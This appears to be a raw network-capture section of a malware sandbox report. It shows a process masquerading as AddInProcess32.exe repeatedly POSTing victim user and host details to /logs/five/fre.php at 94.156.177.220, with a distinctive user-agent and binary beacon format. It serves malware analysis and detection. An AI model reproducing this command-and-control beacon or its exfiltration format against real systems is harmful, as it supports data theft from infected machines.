                                                                                    Oct 24, 2024 08:46:18.328746080 CEST636INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                    Oct 24, 2024 08:46:18.328779936 CEST1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                    Oct 24, 2024 08:46:18.328794956 CEST212INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                    Oct 24, 2024 08:46:18.328811884 CEST1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                    Oct 24, 2024 08:46:18.328831911 CEST1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                    Oct 24, 2024 08:46:18.334239006 CEST1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    15192.168.2.224918894.156.177.220803496C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 24, 2024 08:46:18.370204926 CEST244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.220
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: F0B98DE8
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Oct 24, 2024 08:46:18.375545979 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.ruAlbus040965ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                    Oct 24, 2024 08:46:19.333694935 CEST236INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Thu, 24 Oct 2024 06:46:19 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 23
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Status: 404 Not Found
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    16192.168.2.224918994.156.177.220803496C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 24, 2024 08:46:19.642819881 CEST244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.220
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: F0B98DE8
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Oct 24, 2024 08:46:19.648513079 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.ruAlbus040965ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                    Oct 24, 2024 08:46:20.604633093 CEST236INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Thu, 24 Oct 2024 06:46:20 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 23
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Status: 404 Not Found
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    17192.168.2.224919094.156.177.220803496C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 24, 2024 08:46:20.756772995 CEST244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.220
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: F0B98DE8
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Oct 24, 2024 08:46:20.762213945 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.ruAlbus040965ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                    Oct 24, 2024 08:46:21.709981918 CEST236INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Thu, 24 Oct 2024 06:46:21 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 23
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Status: 404 Not Found
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    18192.168.2.224919194.156.177.220803496C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 24, 2024 08:46:21.844139099 CEST244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.220
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: F0B98DE8
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Oct 24, 2024 08:46:21.849543095 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.ruAlbus040965ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                    Oct 24, 2024 08:46:22.808839083 CEST236INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Thu, 24 Oct 2024 06:46:22 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 23
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Status: 404 Not Found
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    19192.168.2.224919294.156.177.220803496C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 24, 2024 08:46:23.272967100 CEST244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.220
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: F0B98DE8
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Oct 24, 2024 08:46:23.281188965 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.ruAlbus040965ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                    Oct 24, 2024 08:46:24.246784925 CEST236INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Thu, 24 Oct 2024 06:46:24 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 23
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Status: 404 Not Found
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    20192.168.2.224919394.156.177.220803496C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 24, 2024 08:46:24.385406017 CEST244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.220
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: F0B98DE8
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Oct 24, 2024 08:46:24.390799999 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.ruAlbus040965ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                    Oct 24, 2024 08:46:25.331404924 CEST236INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Thu, 24 Oct 2024 06:46:25 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 23
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Status: 404 Not Found
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    21192.168.2.224919494.156.177.220803496C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 24, 2024 08:46:25.477813959 CEST244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.220
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: F0B98DE8
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Oct 24, 2024 08:46:25.483247042 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.ruAlbus040965ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                    Oct 24, 2024 08:46:26.551178932 CEST236INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Thu, 24 Oct 2024 06:46:26 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 23
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Status: 404 Not Found
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    22192.168.2.224919594.156.177.220803496C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 24, 2024 08:46:26.720284939 CEST244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.220
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: F0B98DE8
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Oct 24, 2024 08:46:26.725660086 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.ruAlbus040965ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                    Oct 24, 2024 08:46:28.251620054 CEST236INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Thu, 24 Oct 2024 06:46:27 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 23
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Status: 404 Not Found
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.
                                                                                    Oct 24, 2024 08:46:28.253204107 CEST236INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Thu, 24 Oct 2024 06:46:27 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 23
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Status: 404 Not Found
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    23192.168.2.224919694.156.177.220803496C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 24, 2024 08:46:28.393672943 CEST244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.220
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: F0B98DE8
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Oct 24, 2024 08:46:28.399060965 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.ruAlbus040965ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                    Oct 24, 2024 08:46:29.337935925 CEST236INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Thu, 24 Oct 2024 06:46:29 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 23
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Status: 404 Not Found
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    24192.168.2.224919794.156.177.220803496C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 24, 2024 08:46:29.677758932 CEST244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.220
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: F0B98DE8
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Oct 24, 2024 08:46:29.683232069 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.ruAlbus040965ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                    Oct 24, 2024 08:46:30.655868053 CEST236INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Thu, 24 Oct 2024 06:46:30 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 23
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Status: 404 Not Found
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    25192.168.2.224919894.156.177.220803496C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 24, 2024 08:46:30.892649889 CEST244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.220
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: F0B98DE8
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Oct 24, 2024 08:46:30.898099899 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.ruAlbus040965ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                    Oct 24, 2024 08:46:31.856784105 CEST236INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Thu, 24 Oct 2024 06:46:31 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 23
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Status: 404 Not Found
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    26192.168.2.224919994.156.177.220803496C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 24, 2024 08:46:32.189398050 CEST244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.220
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: F0B98DE8
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Oct 24, 2024 08:46:32.194843054 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.ruAlbus040965ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                    Oct 24, 2024 08:46:33.151381016 CEST236INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Thu, 24 Oct 2024 06:46:33 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 23
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Status: 404 Not Found
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    27192.168.2.224920094.156.177.220803496C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 24, 2024 08:46:33.623204947 CEST244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.220
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: F0B98DE8
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Oct 24, 2024 08:46:33.628717899 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.ruAlbus040965ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                    Oct 24, 2024 08:46:34.578197956 CEST236INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Thu, 24 Oct 2024 06:46:34 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 23
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Status: 404 Not Found
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    28192.168.2.224920194.156.177.220803496C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 24, 2024 08:46:34.727951050 CEST244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.220
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: F0B98DE8
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Oct 24, 2024 08:46:34.733383894 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.ruAlbus040965ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                    Oct 24, 2024 08:46:35.676492929 CEST236INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Thu, 24 Oct 2024 06:46:35 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 23
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Status: 404 Not Found
